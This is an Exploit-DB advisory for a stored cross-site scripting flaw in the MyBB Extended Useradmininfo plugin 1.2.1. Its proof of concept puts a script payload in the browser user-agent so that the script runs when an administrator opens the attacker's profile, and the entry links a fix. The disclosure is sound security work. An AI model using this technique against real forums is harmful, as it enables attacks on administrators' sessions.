MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting

EDB-ID:

31525

CVE:


EDB Verified:

Author:

Fikri Fadzil

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2014-02-09

Vulnerable App: 
# Exploit Title: Extended Useradmininfo MyBB Plugin 1.2.1 - Cross Site
Scripting
# Google Dork: N/A
# Date: 09.02.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage: http://forum.mybboard.de/user-9022.html
# Software Link: http://mods.mybb.com/view/extended-useradmininfo
# Version: 1.2.1
# Tested on: PHP

Description:
This plugin shows advanced Informations about a user, such as last IP, User
Agent, Browser and Operating System. The information will be shown in a
user profile and visible only  for people who are able to see the
adminoptions on user profiles.

Proof of Concept
1. Create a user account.
2. Change your user-agent to "Mozilla<script>alert(1)</script>".
3. Login and then... logout.

* The script will be executed whenever the administrator view your profile.


Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with this
fix:
http://pastebin.com/ncQCvwdq
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services